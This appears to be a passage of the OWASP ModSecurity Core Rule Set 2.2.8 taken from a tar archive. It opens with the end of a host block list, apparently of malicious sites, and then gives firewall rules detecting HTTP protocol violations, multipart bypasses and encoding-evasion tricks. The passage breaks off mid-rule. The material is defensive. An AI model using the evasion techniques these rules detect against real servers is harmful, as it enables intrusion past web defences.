www.wizard.com.br/ www.wolfems.com/ www.womabkr.com.tw/ www.women2day.com/ www.wonie.net/ www.woodwork999.com/ www.wpsistemas.com.br/ www.wsfiz.siedlce.pl/ www.wstardesigns.com/ www.wuweizhou.com/ www.www.dewa.yourfreehosting.net/ www.wycom.co.kr/ www.x4team.com/ www.xedu.kit.net/ www.xfocus.net/ www.xgamex.org/ www.x-pronet.com/ www.xxparceroxx.xpg.com.br/ www.yaco-online.com.br/ www.yak.com.pl/ www.yamagiku.net/ www.yaponamoto.ru/ www.yat.ch/ www.yazd.agri-jahad.ir/ www.ybkor.com/ www.ybrt.cn/ www.ydcommunity.com/ www.yeni.org/ www.yeojuspa.co.kr/ www.yes-tech.co.kr/ www.yihshen.com.tw/ www.ymti.org/ www.yokomagazine.com/ www.yorkza.com/ www.youclinic.com/ www.yourportalonline.com/ www.your-server-with.id-link.goes.here.com/ www.youthsoroca.md/ www.ypm-lpmb.com/ www.yw365.com/ www.ywms.net/ www.zachaem.ru/ www.zahnaerzte-thun.ch/ www.zaknack.com/ www.zenkwanum.nazwa.pl/ www.zhepb.gov.cn/ www.zoldtermekek.hu/ www.zsp6.jaworzno.edu.pl/ www.zumhexenkessel.de/ www.zvezda-spb.ru/ www.zymes.gr/ xaoss.com/ xat.co.kr/ xedu.kit.net/ xenguide.pe.kr/ xexelento.freehostia.com/ xlab.cn.nctu.edu.tw/ xoomer.alice.it/ xoomer.virgilio.it/ .xpg.com.br/ xscan.fileave.com/ xsnuff.yoyo.pl/ xumy.fileave.com/ xxlplan.ovh.net/ yakuza42.t35.com/ .ya.ru/ yasmin.ws/ yateveo.com.mx/ yc44.com/ yeonkok.puru.net/ yongsin.es.kr/ yourmail.fr/ yoursupplements4you.com/ youthcounselor.org/ youthwonju.com/ zacs.ca/ zarafshan.ru/ zargoon.misesajour.com/ zclub.nu/ zetan.fileave.com/ zipclube.com/ znaes.webs.com/ zonadeclientes.com/ zoulekreunion.com/ zphone.co.kr/ zsjs.nmfc.gov.cn/ zxczxc.fileave.com/ zz-dns.com/ ����������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_20_protocol_violations.conf�����0000664�0000000�0000000�00000054515�12164572564�0033440�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Some protocol violations are common in application layer attacks. # Validating HTTP requests eliminates a large number of application layer attacks. # # The purpose of this rules file is to enforce HTTP RFC requirements that state how # the client is supposed to interact with the server. # http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html # # # Validate request line against the format specified in the HTTP RFC # # -=[ Rule Logic ]=- # # Uses rule negation against the regex for positive security. The regex specifies the proper # construction of URI request lines such as: # # "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]] # # It also outlines proper construction for CONNECT, OPTIONS and GET requests. # # -=[ References ]=- # http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.2.1 # http://capec.mitre.org/data/definitions/272.html # SecRule REQUEST_LINE "!^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?|connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?|options \*)\s+[\w\./]+|get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?)$"\ "msg:'Invalid HTTP Request Line',\ severity:'4',\ id:'960911',\ ver:'OWASP_CRS/2.2.8',\ rev:'2',\ maturity:'9',\ accuracy:'9',\ logdata:'%{request_line}',\ phase:1,\ block,\ t:none,\ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ',\ tag:'CAPEC-272',\ setvar:'tx.msg=%{rule.msg}',\ setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},\ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'" # # Identify Invalid URIs Blocked by Apache # # -=[ Rule Logic ]=- # # There are some request violations that Apache will handle internally, prior to the # ModSecurity phase:1 POST-READ-REQUEST hook. For these requests, we can still get # visibility by running a check in phase:5 logging to look for the Apache error msg. # # -=[ References ]=- # SecRule WEBSERVER_ERROR_LOG "@contains Invalid URI in request" \ "msg:'Apache Error: Invalid URI in Request.', \ severity:'4', \ id:'981227', \ ver:'OWASP_CRS/2.2.8', \ rev:'1', \ maturity:'9', \ accuracy:'9', \ logdata:'%{request_line}', \ phase:5, \ pass, \ t:none, \ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ', \ tag:'CAPEC-272', \ setvar:'tx.msg=%{rule.msg}', \ setvar:tx.anomaly_score=+%{tx.notice_anomaly_score}, \ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'" # # Identify multipart/form-data name evasion attempts # # There are possible impedance mismatches between how # ModSecurity interprets multipart file names and how # a destination app server such as PHP might parse the # Content-Disposition data: # # filename-parm := "filename" "=" value # # -=[ Rule Logic ]=- # These rules check for the existence of the ' " ; = meta-characters in # either the file or file name variables. # # -=[ References ]=- # https://www.owasp.org/index.php/ModSecurity_CRS_RuleID-960000 # http://www.ietf.org/rfc/rfc2183.txt # SecRule FILES_NAMES|FILES "['\";=]" \ "msg:'Attempted multipart/form-data bypass', \ severity:'2', \ id:'960000', \ ver:'OWASP_CRS/2.2.8', \ rev:'1', \ maturity:'9', \ accuracy:'7', \ logdata:'%{matched_var}', \ phase:2, \ block, \ t:none,t:urlDecodeUni, \ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ', \ tag:'CAPEC-272', \ setvar:'tx.msg=%{rule.msg}', \ setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, \ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'" # # Verify that we've correctly processed the request body. # # As a rule of thumb, when failing to process a request body # you should reject the request (when deployed in blocking mode) # or log a high-severity alert (when deployed in detection-only mode). # # -=[ Rule Logic ]=- # Checks for the existence of the REQBODY_ERROR variable that is created # by the request body processor if it encounters errors. # # -=[ References ]=- # https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#REQBODY_ERROR # SecRule REQBODY_ERROR "!@eq 0" \ "msg:'Failed to parse request body.', \ severity:'2', \ id:'960912', \ ver:'OWASP_CRS/2.2.8', \ rev:'1', \ maturity:'9', \ accuracy:'9', \ logdata:'%{REQBODY_ERROR_MSG}', \ phase:2, \ block, \ t:none, \ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ', \ tag:'CAPEC-272', \ setvar:'tx.msg=%{rule.msg}', \ setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, \ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'" # # Strict Multipart Parsing Checks # # -=[ Rule Logic ]=- # By default be strict with what we accept in the multipart/form-data # request body. If the rule below proves to be too strict for your # environment consider changing it to detection-only. You are encouraged # _not_ to remove it altogether. # # -=[ References ]=- # https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#MULTIPART_STRICT_ERROR # SecRule MULTIPART_STRICT_ERROR "!@eq 0" \ "msg:'Multipart request body failed strict validation: \ PE %{REQBODY_PROCESSOR_ERROR}, \ BQ %{MULTIPART_BOUNDARY_QUOTED}, \ BW %{MULTIPART_BOUNDARY_WHITESPACE}, \ DB %{MULTIPART_DATA_BEFORE}, \ DA %{MULTIPART_DATA_AFTER}, \ HF %{MULTIPART_HEADER_FOLDING}, \ LF %{MULTIPART_LF_LINE}, \ SM %{MULTIPART_SEMICOLON_MISSING}, \ IQ %{MULTIPART_INVALID_QUOTING}, \ IH %{MULTIPART_INVALID_HEADER_FOLDING}, \ FLE %{MULTIPART_FILE_LIMIT_EXCEEDED}', \ severity:'2', \ id:'960914', \ ver:'OWASP_CRS/2.2.8', \ rev:'1', \ maturity:'8', \ accuracy:'7', \ phase:2, \ block, \ t:none, \ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ', \ tag:'CAPEC-272', \ setvar:'tx.msg=%{rule.msg}', \ setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, \ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'" # # Multipart Unmatched Boundary Check # # -=[ Rule Logic ]=- # Check for the MULTIPART_UNMATCHED_BOUNDARY flag and alert # # -=[ References ]=- # https://sourceforge.net/apps/mediawiki/mod-security/index.php?title=Reference_Manual#MULTIPART_UNMATCHED_BOUNDARY # SecRule MULTIPART_UNMATCHED_BOUNDARY "!@eq 0" \ "msg:'Multipart parser detected a possible unmatched boundary.', \ severity:'2', \ id:'960915', \ ver:'OWASP_CRS/2.2.8', \ rev:'1', \ maturity:'8', \ accuracy:'8', \ phase:2, \ block, \ t:none, \ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ', \ tag:'CAPEC-272', \ setvar:'tx.msg=%{rule.msg}', \ setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}, \ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_REQ-%{matched_var_name}=%{matched_var}'" # # Accept only digits in content length # # -=[ Rule Logic ]=- # This rule uses ModSecurity's rule negation against the regex meaning if the Content-Length header # is NOT all digits, then it will match. # # -=[ References ]=- # http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.13 # SecRule REQUEST_HEADERS:Content-Length "!^\d+$" \ "msg:'Content-Length HTTP header is not numeric.',\ severity:'2',\ id:'960016',\ ver:'OWASP_CRS/2.2.8',\ rev:'1',\ maturity:'9',\ accuracy:'9',\ phase:1,\ block,\ logdata:'%{matched_var}',\ t:none,\ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\ tag:'CAPEC-272',\ setvar:'tx.msg=%{rule.msg}',\ setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}'" # # Do not accept GET or HEAD requests with bodies # HTTP standard allows GET requests to have a body but this # feature is not used in real life. Attackers could try to force # a request body on an unsuspecting web applications. # # -=[ Rule Logic ]=- # This is a chained rule that first checks the Request Method. If it is a # GET or HEAD method, then it checks for the existence of a Content-Length # header. If the header exists and its payload is either not a 0 digit or not # empty, then it will match. # # -=[ References ]=- # http://www.w3.org/Protocols/rfc2616/rfc2616-sec4.html#sec4.3 # SecRule REQUEST_METHOD "^(?:GET|HEAD)$" \ "msg:'GET or HEAD Request with Body Content.',\ severity:'2',\ id:'960011',\ ver:'OWASP_CRS/2.2.8',\ rev:'1',\ maturity:'9',\ accuracy:'9',\ phase:1,\ block,\ logdata:'%{matched_var}',\ t:none,\ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\ tag:'CAPEC-272',\ chain" SecRule REQUEST_HEADERS:Content-Length "!^0?$"\ "t:none,\ setvar:'tx.msg=%{rule.msg}',\ setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},\ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}'" # # Require Content-Length to be provided with every POST request. # # -=[ Rule Logic ]=- # This chained rule checks if the request method is POST, if so, it checks that a Content-Length # header is also present. # # -=[ References ]=- # http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.5 # SecRule REQUEST_METHOD "^POST$" \ "msg:'POST request missing Content-Length Header.',\ severity:'4',\ id:'960012',\ ver:'OWASP_CRS/2.2.8',\ rev:'1',\ maturity:'9',\ accuracy:'9',\ phase:1,\ block,\ logdata:'%{matched_var}',\ t:none,\ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\ tag:'CAPEC-272',\ chain" SecRule &REQUEST_HEADERS:Content-Length "@eq 0" \ "t:none,\ setvar:'tx.msg=%{rule.msg}',\ setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},\ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}'" # # Deny inbound compressed content # identity The default (identity) encoding; the use of no transformation whatsoever. # This content-coding is used only in the Accept- Encoding header, and SHOULD NOT be # used in the Content-Encoding header. # # -=[ Rule Logic ]=- # This rule inspects the Content-Encoding request header to ensure that Identity # is not specified. # # -=[ References ]=- # http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html # SecRule REQUEST_HEADERS:Content-Encoding "^Identity$" \ "msg:'Invalid Use of Identity Encoding.',\ severity:'4',\ id:'960902',\ ver:'OWASP_CRS/2.2.8',\ rev:'2',\ maturity:'9',\ accuracy:'9',\ phase:1,\ block,\ logdata:'%{matched_var}',\ t:none,\ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\ tag:'CAPEC-272',\ setvar:'tx.msg=%{rule.msg}',\ setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},\ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}'" # # Expect header is an HTTP/1.1 protocol feature # Automated programs and bots often do not obey the HTTP RFC # # -=[ Rule Logic ]=- # This chained rule looks for the Expect request header, and if it is found then it # checks the HTTP protocol version supplied by the client. If it is version 1.0, the # rule matches. # # -=[ References ]=- # http://www.bad-behavior.ioerror.us/documentation/how-it-works/ # SecRule REQUEST_HEADERS:Expect "@contains 100-continue" \ "msg:'Expect Header Not Allowed for HTTP 1.0.',\ severity:'5',\ id:'960022',\ ver:'OWASP_CRS/2.2.8',\ rev:'2',\ maturity:'7',\ accuracy:'9',\ phase:1,\ block,\ logdata:'%{matched_var}',\ t:none,\ tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',\ tag:'CAPEC-272',\ chain" SecRule REQUEST_PROTOCOL "@streq HTTP/1.0" \ "t:none,\ setvar:'tx.msg=%{rule.msg}',\ setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},\ setvar:'tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}'" # # Pragma Header requires a Cache-Control Header # Automated programs and bots often do not obey the HTTP RFC # # -=[ Rule Logic ]=- # This chained rule first checks for the existence of a Pragma request header. If it is found, # then it checks for a corresponding Cache-Control header (as the HTTP 1.1 RFC states clients should submit # one). If this is also missing, then it verifies the HTTP protocol version. If it is 1.1 then the rule # matches. # # -=[ References ]=- # http://www.bad-behavior.ioerror.us/documentation/how-it-works/ # SecRule &REQUEST_HEADERS:Pragma "@eq 1" "chain,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Pragma Header requires Cache-Control Header for HTTP/1.1 requests.',severity:'5',id:'960020',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ'" SecRule &REQUEST_HEADERS:Cache-Control "@eq 0" "chain" SecRule REQUEST_PROTOCOL "@streq HTTP/1.1" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}" # # Range Header Checks # # 1. Range Header exists and begins with 0 - normal browsers don't do this. # Automated programs and bots often do not obey the HTTP RFC # # -=[ Rule Logic ]=- # This rule inspects the Range request header to see if it starts with 0. # # -=[ References ]=- # http://www.bad-behavior.ioerror.us/documentation/how-it-works/ # # 2. Per RFC 2616 - # "If the last-byte-pos value is present, it MUST be greater than or equal to the first-byte-pos in that byte-range-spec, # or the byte- range-spec is syntactically invalid." # -=[ Rule Logic ]=- # This rule compares the first and second byte ranges and flags when the first value is greater than the second. # # -=[ References ]=- # http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html # http://seclists.org/fulldisclosure/2011/Aug/175 # # 3. Identifies an excessive number of byte range fields within one request # SecRule REQUEST_HEADERS:Range "@beginsWith bytes=0-" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Range: field exists and begins with 0.',logdata:'%{matched_var}',severity:'4',id:'958291',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "(\d+)\-(\d+)\," "chain,capture,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Range: Invalid Last Byte Value.',logdata:'%{matched_var}',severity:'4',id:'958230',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}" SecRule TX:2 "!@ge %{tx.1}" SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "^bytes=(\d+)?\-(\d+)?\,\s?(\d+)?\-(\d+)?\,\s?(\d+)?\-(\d+)?\,\s?(\d+)?\-(\d+)?\,\s?(\d+)?\-(\d+)?\," "phase:2,capture,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Range: Too many fields',logdata:'%{matched_var}',severity:'4',id:'958231',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}" # # Broken/Malicous clients often have duplicate or conflicting headers # Automated programs and bots often do not obey the HTTP RFC # # -=[ Rule Logic ]=- # This rule inspects the Connection header and looks for duplicates of the # keep-alive and close options. # # -=[ References ]=- # http://www.bad-behavior.ioerror.us/documentation/how-it-works/ # SecRule REQUEST_HEADERS:Connection "\b(keep-alive|close),\s?(keep-alive|close)\b" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Multiple/Conflicting Connection Header Data Found.',logdata:'%{matched_var}',id:'958295',tag:'OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ-%{matched_var_name}=%{matched_var}" # # Check URL encodings # # -=[ Rule Logic ]=- # There are two different chained rules. We need to separate them as we are inspecting two # different variables - REQUEST_URI and REQUEST_BODY. For REQUEST_BODY, we only want to # run the @validateUrlEncoding operator if the content-type is application/x-www-form-urlencoding. # # -=[ References ]=- # http://www.ietf.org/rfc/rfc1738.txt # SecRule REQUEST_URI "\%((?!$|\W)|[0-9a-fA-F]{2}|u[0-9a-fA-F]{4})" \ "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'URL Encoding Abuse Attack Attempt',id:'950107',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'4'" SecRule REQUEST_URI "@validateUrlEncoding" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}" SecRule ARGS "\%((?!$|\W)|[0-9a-fA-F]{2}|u[0-9a-fA-F]{4})" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Multiple URL Encoding Detected',id:'950109',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}" SecRule REQUEST_HEADERS:Content-Type "^(application\/x-www-form-urlencoded|text\/xml)(?:;(?:\s?charset\s?=\s?[\w\d\-]{1,18})?)??$" \ "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'URL Encoding Abuse Attack Attempt',id:'950108',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'4'" SecRule REQUEST_BODY|XML:/* "\%((?!$|\W)|[0-9a-fA-F]{2}|u[0-9a-fA-F]{4})" "chain" SecRule REQUEST_BODY|XML:/* "@validateUrlEncoding" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}" # # Check UTF enconding # We only want to apply this check if UTF-8 encoding is actually used by the site, otherwise # it will result in false positives. # # -=[ Rule Logic ]=- # This chained rule first checks to see if the admin has set the TX:CRS_VALIDATE_UTF8_ENCODING # variable in the modsecurity_crs_10_config.conf file. # SecRule TX:CRS_VALIDATE_UTF8_ENCODING "@eq 1" "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'UTF8 Encoding Abuse Attack Attempt',id:'950801',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'4'" SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "@validateUtf8Encoding" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}" # # Disallow use of full-width unicode as decoding evasions my be possible. # # -=[ Rule Logic ]=- # This rule looks for full-width encoding by looking for %u following by 2 f characters # and then 2 hex characters. # # -=[ References ]=- # http://www.kb.cert.org/vuls/id/739224 # SecRule REQUEST_URI|REQUEST_BODY "\%u[fF]{2}[0-9a-fA-F]{2}" \ "t:none,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',block,msg:'Unicode Full/Half Width Abuse Attack Attempt',id:'950116',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}" # # Proxy access attempt # NOTE Apache blocks such access by default if not set as a proxy. The rule is # included in case Apache proxy is misconfigured. # NOTE There are some clients (mobile devices) that will send a full URI even when connecting to # your local application and this rule allows it. # NOTE Need to have UseCanonicalName On in Apache config to properly set the SERVER_NAME variable. # If you have set UseCanonicalName, the you can uncomment this rule. # # -=[ Rule Logic ]=- # This chained rule first inspects the URI to see if a full domain name is specified. # If it is, then this data is compared against the Cononical SERVER_NAME. If it does # not match, then the client is making a request for an off-site location. # #SecRule REQUEST_URI_RAW "^\w+:/" "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Proxy access attempt',severity:'3',id:'960014',tag:'OWASP_CRS/PROTOCOL_VIOLATION/PROXY_ACCESS'" #SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/PROXY_ACCESS-%{matched_var_name}=%{matched_var}" # # Restrict type of characters sent # NOTE In order to be broad and support localized applications this rule # only validates that NULL Is not used. # # The strict policy version also validates that protocol and application # generated fields are limited to printable ASCII. # # -=[ Rule Logic ]=- # This rule uses the @validateByteRange operator to look for Nul Bytes. # If you set Paranoid Mode - it will check if your application use the range 32-126 for parameters. # # -=[ References ]=- # http://i-technica.com/whitestuff/asciichart.html # SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "@validateByteRange 1-255" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',block,msg:'Invalid character in request',id:'960901',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'3',t:none,t:urlDecodeUni,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}" SecRule TX:PARANOID_MODE "@eq 1" "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'7',block,msg:'Invalid character in request',id:'960018',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'3',t:none,t:urlDecodeUni" SecRule REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|TX:HPP_DATA \ "@validateByteRange 32-126" \ "t:urlDecodeUni,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_21_protocol_anomalies.conf������0000664�0000000�0000000�00000015402�12164572564�0033212�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Some common HTTP usage patterns are indicative of attacks but may also be used by non-browsers for legitimate uses. # # Do not accept requests without common headers. # All normal web browsers include Host, User-Agent and Accept headers. # Implies either an attacker or a legitimate automation client. # # # Missing/Empty Host Header # # -=[ Rule Logic ]=- # These rules will first check to see if a Host header is present. # The second check is to see if a Host header exists but is empty. # SecMarker BEGIN_HOST_CHECK SecRule &REQUEST_HEADERS:Host "@eq 0" \ "skipAfter:END_HOST_CHECK,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Request Missing a Host Header',id:'960008',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}" SecRule REQUEST_HEADERS:Host "^$" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Empty Host Header',id:'960007',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}" SecMarker END_HOST_CHECK # # Missing/Empty Accept Header # # -=[ Rule Logic ]=- # These rules will first check to see if an Accept header is present. # The second check is to see if an Accept header exists but is empty. # SecMarker BEGIN_ACCEPT_CHECK SecRule REQUEST_METHOD "!^OPTIONS$" \ "skipAfter:END_ACCEPT_CHECK,chain,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Request Missing an Accept Header',severity:'5',id:'960015',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_ACCEPT',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10'" SecRule &REQUEST_HEADERS:Accept "@eq 0" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}" SecRule REQUEST_METHOD "!^OPTIONS$" \ "chain,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Request Has an Empty Accept Header',severity:'5',id:'960021',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_ACCEPT'" SecRule REQUEST_HEADERS:Accept "^$" 